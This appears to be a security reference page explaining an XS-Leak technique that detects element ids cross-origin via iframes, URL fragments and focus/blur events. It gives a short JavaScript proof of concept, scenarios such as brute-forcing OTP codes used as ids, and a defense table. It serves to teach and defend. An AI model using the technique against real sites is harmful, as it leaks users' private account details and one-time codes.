ID Attribute

ID Attribute

October 1, 2020

The id attribute is widely used to identify HTML elements. Unfortunately, cross-origin websites can determine whether a given id is set anywhere on a page by leveraging the focus event and URL fragments. If https://example.com/foo#bar is loaded, the browser attempts to scroll to the element with id="bar". This can be detected cross-origin by loading https://example.com/foo#bar in an iframe; if there is an element with id="bar", the focus event fires. The blur event can also be used for the same purpose 1.

Some web applications set id attributes in focusable elements that can lead to disclosing user information. These ids can either contain information directly related to the user (e.g. a secret), or information associated with a user state (e.g. account status). Run demo

Code snippet #

The below snippet presents an example of detecting the ID attribute from another site:

// Listen to onblur event
onblur = () => {
  alert('Focus was lost, so there is a focusable element with the specified ID');
}
var ifr = document.createElement('iframe');
// If a page has a focusable element with id="x" it will gain focus
// E.g. <input id="x" value="test" />
ifr.src = 'https://example.org/#x';
document.body.appendChild(ifr);

info

The above technique doesn’t seem to work in Firefox.

Case Scenarios #

Some examples of id-attribute-based attacks are:

  • A bank allows its clients to generate short numeric One-Time PINs (OTP) in the browser application to authenticate sessions on mobile devices. The bank used the OTP as the id of a button that is used to show the PIN to the client. This approach could be abused to steal these OTP codes by brute-forcing every option and then using them to compromise user accounts.
  • A web application uses a specific set of predefined ids and HTML elements when an account has a premium status or the user is of a certain gender. The attacker can detect whether a specific id is present on the victim’s page and leak the account information.

Defense #

info

As of September 2022, an experiment called Portals exists that could allow the attack to work with Framing Protections [^2]
Document PoliciesSameSite Cookies (Lax)COOPFraming ProtectionsIsolation Policies
✔️✔️✔️FIP

References #

  1. Leaking IDs using focus, link ↩︎